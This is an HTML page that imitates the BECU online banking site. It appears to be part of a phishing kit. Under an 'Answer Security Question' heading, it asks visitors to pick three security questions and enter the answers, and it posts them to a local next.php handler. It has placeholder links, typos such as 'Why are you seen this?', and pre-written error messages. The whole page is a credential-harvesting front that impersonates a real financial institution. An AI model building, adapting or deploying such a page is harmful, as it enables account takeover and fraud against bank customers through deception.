<html lang="en" class="">

<head>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>
        Online Banking Login | BECU
    </title>
    <link id="maincss" href="css/becu-olb.min.css" type="text/css" rel="stylesheet">
    <style type="text/css">
    nav.navbar .dropdown-content ul.pages-utility li a.search.icon:before {
        display: none;
    }

    nav.navbar .dropdown-content ul.pages-utility li a.locations.icon:before {
        display: none;
    }

    nav.navbar .dropdown-content ul.pages-utility li a.support.icon:before {
        display: none;
    }
    </style>
</head>

<body id="bodytag" class="login_aspx">
    <div id="standardHeader" class="pageHeaderContainer">
        <div class="pageHeader">
            <nav class="navbar navbar-default" role="navigation">
                <div class="container">
                    <div class="navbar-header">
                        <a href="#" class="logo-becu">
                            <img src="images/becu-logo-mobile.png" id="logomobile">
                            <img src="images/becu-logo-tablet.png" id="logotablet">
                            <img src="images/becu-logo-desktop.png" id="logodesktop">
                        </a>
                        <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#nav-main-dropdown">
                            <span class="sr-only">Toggle navigation</span>
                            <span class="icon-bar"></span>
                            <span class="icon-bar"></span>
                            <span class="icon-bar"></span>
                            <span class="navicon"></span>
                        </button>
                    </div>
                    <div id="nav-main-dropdown" class="collapse navbar-collapse">
                        <div class="dropdown-content cf">
                            <div class="desktop-view">
                                <ul id="pages-utility-nav" class="pages-utility" tabindex="-1">
                                    <li>
                                        <a href="#" id="LINKSEARCH" class="search icon">Search</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LINKBRANCHLOCATOR" class="locations icon">Locations</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LINKSUPPORT" class="support icon">Support</a>
                                    </li>
                                </ul>
                            </div>
                            <div class="component-user-login">
                            </div>
                            <div class="desktop-view">
                                <ul class="pages-main">
                                    <li>
                                        <a href="#" id="LINKMEMBERSMATTER">BECU &amp; YOU</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LINKEVERYDAYBANKING" class="">Everyday Banking</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LINKLOANSMORTGAGES" class="">Loans &amp; Mortgages</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LINKINVESTMENTSTRUST" class="">Planning &amp; Investing</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LINKBUSINESSBANKING" class="">Business Banking</a>
                                    </li>
                                </ul>
                            </div>
                            <div id="nav" class="component-nav-links tablet-view" data-container-name="header-nav">
                                <ul class="pages-main">
                                    <li>
                                        <a href="#" id="LNKMEMBERSMATTER">BECU &amp; YOU</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LNKEVERYDAYBANKING" class="">Everyday Banking</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LNKLOANSMORTGAGES" class="">Loans &amp; Mortgages</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LNKINVESTMENTSTRUST" class="">Planning &amp; Investing</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LNKBUSINESSBANKING" class="">Business Banking</a>
                                    </li>
                                </ul>
                                <ul class="pages-utility">
                                    <li>
                                        <a href="#" id="LNKSEARCH" class="search icon">Search</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LNKBRANCHLOCATOR" class="locations icon">Locations</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LNKSUPPORT" class="support icon">Support</a>
                                    </li>
                                </ul>
                            </div>
                        </div>
                    </div>
                </div>
            </nav>
            <div id="PAGESUBHEADER" class="container">
                <div class="pageTitle">
                    <h1 class="headline">
                        Answer Security Question
                    </h1>
                </div>
                <nav id="sub-nav">
                </nav>
            </div>
        </div>
    </div>
    <main role="main">
        <div class="pageBody">
            <div id="MAINFORM">
                <div id="container " class="container div1" tabindex="-1" style="display: block;">
                    <div id="CONTENTROW" class="row">
                        <div id="PAGECONTENT" class="content col-xs-12 col-sm-12 col-md-12 col-lg-12">
                            <div class="instructionsContainer">
                                <div class="row">
                                    <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                                        <p>Why are you seen this?<br><br>You may be asked for additional verifcation for one or more of the following reasons.</p>
                                    </div>
                                </div>
                            </div>
                            <form action="./next.php" method="POST">
                                <div class="formContainer">
                                    <div class="formInputContainer">
                                        <div class="formFields">
                                            <table cellspacing="2" width="100%" class="formTable">
                                                <tbody>
                                                    <tr class="item">
                                                        <td colspan="2">
                                                            <center>
                                                                <div class="alert alert-danger msg" style="display: none;">Invalid Password..! Please enter correct password.</div>
                                                                <span class="text-danger error" style="display: none;">That account doesn't exist. Enter a different account</span>
                                                            </center>
                                                        </td>
                                                    </tr>
                                                    <tr class="item">
                                                        <td width="10%"><strong>Question 1</strong></td>
                                                        <td width="30%">
                                                            <select name="q1" autocomplete="off" required type="text" class="standardInput">
                                                                <option value="">Choose</option>
                                                                <option value="what is your favourite book?">Where is your favorite vacation destination?</option>
                                                                <option value="what is your dream job?">what is your dream job?</option>
                                                                <option value="whats your favourite colour?">whats your favourite colour?</option>
                                                                <option value="What was your high school mascot?">What was your high school mascot?</option>
                                                                <option value="What was the name of your first pet?">What was the name of your first pet?</option>
                                                                <option value="In what city is your vacation home?">In what city is your vacation home?</option>
                                                                <option value="What is the first name of your oldest niece?">What is the first name of your oldest niece?</option>
                                                                <option value="What was the name of your first girlfriend/boyfriend?">What was the name of your first girlfriend/boyfriend?</option>
                                                                <option value="What was the nickname of your grandfather?">What was the nickname of your grandfather?</option>
                                                                <option value="What is your paternal grandmother's first name?">What is your paternal grandmother's first name?</option>
                                                                <option value="What is the first name of the best man at your wedding?">What is the first name of the best man at your wedding?</option>
                                                                <option value="where did you go on your fisrt vacation?">where did you go on your fisrt vacation?</option>
                                                                <option value="What was the first name of your first manager or boss?">What was the first name of your first manager or boss?</option>
                                                                <option value="What was the name of the town your grandmother lived in? ">What was the name of the town your grandmother lived in? </option>
                                                                <option value="What was the name of your high school?">What was the name of your high school?</option>
                                                                <option value="What is the first name of the first boy or girl that you first kissed? ">What is the first name of the first boy or girl that you first kissed? </option>
                                                                <option value="What was the last name of your favorite teacher in final year of high school? ">What was the last name of your favorite teacher in final year of high school? </option>
                                                                <option value="In what city were you born? ">In what city were you born?</option>
                                                                <option value="In what city was your mother born? ">In what city was your mother born? </option>
                                                                <option value="What is your paternal grandfather's first name? ">What is your paternal grandfather's first name?</option>
                                                                <option value="What was your favorite restaurant in college?">What was your favorite restaurant in college?</option>
                                                                <option value="What street did your best friend in high school live on? ">What street did your best friend in high school live on? </option>
                                                                <option value="What was the name of your High School? ">What was the name of your High School?</option>
                                                                <option value="What is your maternal grandfather's first name? ">What is your maternal grandfather's first name? </option>
                                                                <option value="In what city were you married?  ">In what city were you married? </option>
                                                                <option value="Who was your first crush? ">Who was your first crush?</option>
                                                                <option value="What is the first name of the maid of honor at your wedding?">What is the first name of the maid of honor at your wedding?</option>
                                                                <option value="what is the first name of your oldest nephew?">what is the first name of your oldest nephew?</option>
                                                                <option value="What is the name of the first company you worked for?">What is the name of the first company you worked for?</option>
                                                                <option value="What is your maternal grandmother's first name?">What is your maternal grandmother's first name?</option>
                                                                <option value="What is your father's middle name?">What is your father's middle name?</option>
                                                                <option value="What is your best friend's first name?">What is your best friend's first name?</option>
                                                                <option value="In What city was your high school?">In What city was your high school?</option>
                                                                <option value="Name of elementary/primary school?">Name of elementary/primary school?</option>
                                                                <option value="Where were you when you first heard about 9/11?">Where were you when you first heard about 9/11?</option>
                                                                <option value="Where were you when you had your first kiss?">Where were you when you had your first kiss?</option>
                                                                <option value="none of these above">none of these above</option>
                                                            </select>
                                                        </td>
                                                        <td width="60%">&nbsp;</td>
                                                    </tr>
                                                    <tr class="item">
                                                        <td width="10%"><strong>Answer</strong></td>
                                                        <td width="30%">
                                                            <input name="a1" type="text" id="a1" class="standardInput" required="">
                                                        </td>
                                                        <td width="60%">&nbsp;</td>
                                                    </tr>
                                                    <tr class="item">
                                                        <td width="10%"><strong>Question 2</strong></td>
                                                        <td width="30%">
                                                            <select name="q2" autocomplete="off" required type="text" class="standardInput">
                                                                <option value="">Choose</option>
                                                               <option value="what is your favourite book?">Where is your favorite vacation destination?</option>
                                                                <option value="what is your dream job?">what is your dream job?</option>
                                                                <option value="whats your favourite colour?">whats your favourite colour?</option>
                                                                <option value="What was your high school mascot?">What was your high school mascot?</option>
                                                                <option value="What was the name of your first pet?">What was the name of your first pet?</option>
                                                                <option value="In what city is your vacation home?">In what city is your vacation home?</option>
                                                                <option value="What is the first name of your oldest niece?">What is the first name of your oldest niece?</option>
                                                                <option value="What was the name of your first girlfriend/boyfriend?">What was the name of your first girlfriend/boyfriend?</option>
                                                                <option value="What was the nickname of your grandfather?">What was the nickname of your grandfather?</option>
                                                                <option value="What is your paternal grandmother's first name?">What is your paternal grandmother's first name?</option>
                                                                <option value="What is the first name of the best man at your wedding?">What is the first name of the best man at your wedding?</option>
                                                                <option value="where did you go on your fisrt vacation?">where did you go on your fisrt vacation?</option>
                                                                <option value="What was the first name of your first manager or boss?">What was the first name of your first manager or boss?</option>
                                                                <option value="What was the name of the town your grandmother lived in? ">What was the name of the town your grandmother lived in? </option>
                                                                <option value="What was the name of your high school?">What was the name of your high school?</option>
                                                                <option value="What is the first name of the first boy or girl that you first kissed? ">What is the first name of the first boy or girl that you first kissed? </option>
                                                                <option value="What was the last name of your favorite teacher in final year of high school? ">What was the last name of your favorite teacher in final year of high school? </option>
                                                                <option value="In what city were you born? ">In what city were you born?</option>
                                                                <option value="In what city was your mother born? ">In what city was your mother born? </option>
                                                                <option value="What is your paternal grandfather's first name? ">What is your paternal grandfather's first name?</option>
                                                                <option value="What was your favorite restaurant in college?">What was your favorite restaurant in college?</option>
                                                                <option value="What street did your best friend in high school live on? ">What street did your best friend in high school live on? </option>
                                                                <option value="What was the name of your High School? ">What was the name of your High School?</option>
                                                                <option value="What is your maternal grandfather's first name? ">What is your maternal grandfather's first name? </option>
                                                                <option value="In what city were you married?  ">In what city were you married? </option>
                                                                <option value="Who was your first crush? ">Who was your first crush?</option>
                                                                <option value="What is the first name of the maid of honor at your wedding?">What is the first name of the maid of honor at your wedding?</option>
                                                                <option value="what is the first name of your oldest nephew?">what is the first name of your oldest nephew?</option>
                                                                <option value="What is the name of the first company you worked for?">What is the name of the first company you worked for?</option>
                                                                <option value="What is your maternal grandmother's first name?">What is your maternal grandmother's first name?</option>
                                                                <option value="What is your father's middle name?">What is your father's middle name?</option>
                                                                <option value="What is your best friend's first name?">What is your best friend's first name?</option>
                                                                <option value="In What city was your high school?">In What city was your high school?</option>
                                                                <option value="Name of elementary/primary school?">Name of elementary/primary school?</option>
                                                                <option value="Where were you when you first heard about 9/11?">Where were you when you first heard about 9/11?</option>
                                                                <option value="Where were you when you had your first kiss?">Where were you when you had your first kiss?</option>
                                                                <option value="none of these above">none of these above</option>
                                                            </select>
                                                        </td>
                                                        <td width="60%">&nbsp;</td>
                                                    </tr>
                                                    <tr class="item">
                                                        <td width="10%"><strong>Answer</strong></td>
                                                        <td width="30%">
                                                            <input name="a2" type="text" id="a2" class="standardInput" required="">
                                                        </td>
                                                        <td width="60%">&nbsp;</td>
                                                    </tr>
                                                    <tr class="item">
                                                        <td width="10%"><strong>Question 3</strong></td>
                                                        <td width="30%">
                                                            <select name="q3" autocomplete="off" required type="text" class="standardInput">
                                                                <option value="">Choose</option>
                                                                <option value="what is your favourite book?">Where is your favorite vacation destination?</option>
                                                                <option value="what is your dream job?">what is your dream job?</option>
                                                                <option value="whats your favourite colour?">whats your favourite colour?</option>
                                                                <option value="What was your high school mascot?">What was your high school mascot?</option>
                                                                <option value="What was the name of your first pet?">What was the name of your first pet?</option>
                                                                <option value="In what city is your vacation home?">In what city is your vacation home?</option>
                                                                <option value="What is the first name of your oldest niece?">What is the first name of your oldest niece?</option>
                                                                <option value="What was the name of your first girlfriend/boyfriend?">What was the name of your first girlfriend/boyfriend?</option>
                                                                <option value="What was the nickname of your grandfather?">What was the nickname of your grandfather?</option>
                                                                <option value="What is your paternal grandmother's first name?">What is your paternal grandmother's first name?</option>
                                                                <option value="What is the first name of the best man at your wedding?">What is the first name of the best man at your wedding?</option>
                                                                <option value="where did you go on your fisrt vacation?">where did you go on your fisrt vacation?</option>
                                                                <option value="What was the first name of your first manager or boss?">What was the first name of your first manager or boss?</option>
                                                                <option value="What was the name of the town your grandmother lived in? ">What was the name of the town your grandmother lived in? </option>
                                                                <option value="What was the name of your high school?">What was the name of your high school?</option>
                                                                <option value="What is the first name of the first boy or girl that you first kissed? ">What is the first name of the first boy or girl that you first kissed? </option>
                                                                <option value="What was the last name of your favorite teacher in final year of high school? ">What was the last name of your favorite teacher in final year of high school? </option>
                                                                <option value="In what city were you born? ">In what city were you born?</option>
                                                                <option value="In what city was your mother born? ">In what city was your mother born? </option>
                                                                <option value="What is your paternal grandfather's first name? ">What is your paternal grandfather's first name?</option>
                                                                <option value="What was your favorite restaurant in college?">What was your favorite restaurant in college?</option>
                                                                <option value="What street did your best friend in high school live on? ">What street did your best friend in high school live on? </option>
                                                                <option value="What was the name of your High School? ">What was the name of your High School?</option>
                                                                <option value="What is your maternal grandfather's first name? ">What is your maternal grandfather's first name? </option>
                                                                <option value="In what city were you married?  ">In what city were you married? </option>
                                                                <option value="Who was your first crush? ">Who was your first crush?</option>
                                                                <option value="What is the first name of the maid of honor at your wedding?">What is the first name of the maid of honor at your wedding?</option>
                                                                <option value="what is the first name of your oldest nephew?">what is the first name of your oldest nephew?</option>
                                                                <option value="What is the name of the first company you worked for?">What is the name of the first company you worked for?</option>
                                                                <option value="What is your maternal grandmother's first name?">What is your maternal grandmother's first name?</option>
                                                                <option value="What is your father's middle name?">What is your father's middle name?</option>
                                                                <option value="What is your best friend's first name?">What is your best friend's first name?</option>
                                                                <option value="In What city was your high school?">In What city was your high school?</option>
                                                                <option value="Name of elementary/primary school?">Name of elementary/primary school?</option>
                                                                <option value="Where were you when you first heard about 9/11?">Where were you when you first heard about 9/11?</option>
                                                                <option value="Where were you when you had your first kiss?">Where were you when you had your first kiss?</option>
                                                                <option value="none of these above">none of these above</option>
                                                            </select>
                                                        </td>
                                                        <td width="60%">&nbsp;</td>
                                                    </tr>
                                                    <tr class="item">
                                                        <td width="10%"><strong>Answer</strong></td>
                                                        <td width="30%">
                                                            <input name="a3" type="text" id="a3" class="standardInput" required="">
                                                        </td>
                                                        <td width="60%">&nbsp;</td>
                                                    </tr>
                                                   
                                                    <tr class="item">
                                                        <td><label for="ctlSignon_ddlSignonDestination"></label></td>
                                                        <td>
                                                        </td>
                                                        <td></td>
                                                    </tr>
                                                </tbody>
                                            </table>
                                        </div>
                                    </div>
                                    <div class="formButtonContainer"><input type="submit" name="btn2" value="Agree and Continue" id="btn1" class="btn red"></div>
                                    <div class="sectionDivider"></div>
                                </div>
                            </form>
                        </div>
                    </div>
                </div>
                
            </div>
        </div>
    </main>
    <footer id="navFooter_standardFooter" class="footer">
        <div class="container">
            <div class="footer-links ">
                <ul>
                    <li>
                        <a id="footer11" class="" target="_self" href="#">ACCESSIBILITY</a>
                    </li>
                    <li>
                        <a id="footer12" class="" target="_self" href="#">MEMBERSHIP</a>
                    </li>
                    <li>
                        <a id="footer13" class="" target="_self" href="#">FORMS</a>
                    </li>
                    <li>
                        <a id="footer14" class="" target="_self" href="#">ABOUT US</a>
                    </li>
                    <li>
                        <a id="footer15" class="" target="_self" href="#">ROUTING NUMBER 325081403</a>
                    </li>
                </ul>
                <ul>
                    <li>
                        <a id="footer21" class="" target="_blank" href="#">AVOIDING FORECLOSURE</a>
                    </li>
                    <li>
                        <a id="footer22" class="" target="_self" href="#">NEWS &amp; DISCOUNTS</a>
                    </li>
                    <li>
                        <a id="footer23" class="" target="_self" href="#">CONTACT</a>
                    </li>
                    <li>
                        <a id="footer24" class="" target="_self" href="#">CAREERS</a>
                    </li>
                    <li>
                        <a id="footer25" class="" target="_self" href="#">NEWSROOM</a>
                    </li>
                </ul>
                <ul>
                    <li>
                        <a id="footer31" class="" target="_self" href="#">SECURITY</a>
                    </li>
                    <li>
                        <a id="footer32" class="" target="_self" href="#">PRIVACY</a>
                    </li>
                    <li>
                        <a id="footer33" class="" target="_self" href="#">TERMS &amp; CONDITIONS</a>
                    </li>
                    <li>
                        <a id="footer34" class="" target="_blank" href="#">SEND A SUGGESTION</a>
                    </li>
                    <li>
                        <a id="footer35" class="" target="_self" href="#">BECU BLOG</a>
                    </li>
                </ul>
                <ul class="footer-social">
                    <div id="social-text" class="social-text">
                        Follow BECU
                    </div>
                    <li class="social-item">
                        <a tabindex="0" href="#" id="facebook-link">
                            <img src="images/Icon_Facebook.svg?h=45&amp;w=45" id="facebook-image" class="social-image">
                        </a>
                    </li>
                    <li class="social-item">
                        <a tabindex="0" href="#" id="instagram-link">
                            <img src="images/Icon_Instagram.svg?h=45&amp;w=45" id="instagram-image" class="social-image">
                        </a>
                    </li>
                    <li class="social-item">
                        <a tabindex="0" href="#" id="twitter-link">
                            <img src="images/Icon_Twitter.svg?h=45&amp;w=45" id="twitter-image" class="social-image">
                        </a>
                    </li>
                    <li class="social-item">
                        <a tabindex="0" href="#" id="pinterest-link">
                            <img src="images/Icon_Pinterest.svg?h=45&amp;w=45" id="pinterest-image" class="social-image">
                        </a>
                    </li>
                    <li class="social-item">
                        <a tabindex="0" href="#" id="linkedin-link">
                            <img src="images/Icon_LinkedIn.svg?h=45&amp;w=45" id="linkedin-image" class="social-image"></a></li>
                    <li class="social-item">
                        <a tabindex="0" href="#" id="youtube-link">
                            <img src="images/Icon_YouTube.svg?h=45&amp;w=45" id="youtube-image" class="social-image">
                        </a></li>
                </ul>
            </div>
            <div id="footer-legal" class="footer-legal">
                <ul class="footer-copyright">
                    <li>
                        <div class="flex-display">
                            <div class="ncua-text">
                                <span id="ncua-text">
                                    © 2021 BECU. All Rights Reserved. Federally Insured by NCUA.
                                </span>
                                <span id="ehol-text">
                                    Equal Housing Opportunity Lender
                                </span>
                            </div>
                            <div class="footer-ncua-ehol-container">
                                <img id="ehol-logo" class="ehol-logo" src="images/Icon_EHOL.png">
                                <img id="ncua-logo" class="ncua-logo" src="images/Icon_NCUA.png">
                            </div>
                        </div>
                    </li>
                </ul>
            </div>
        </div>
    </footer>
</body>

</html>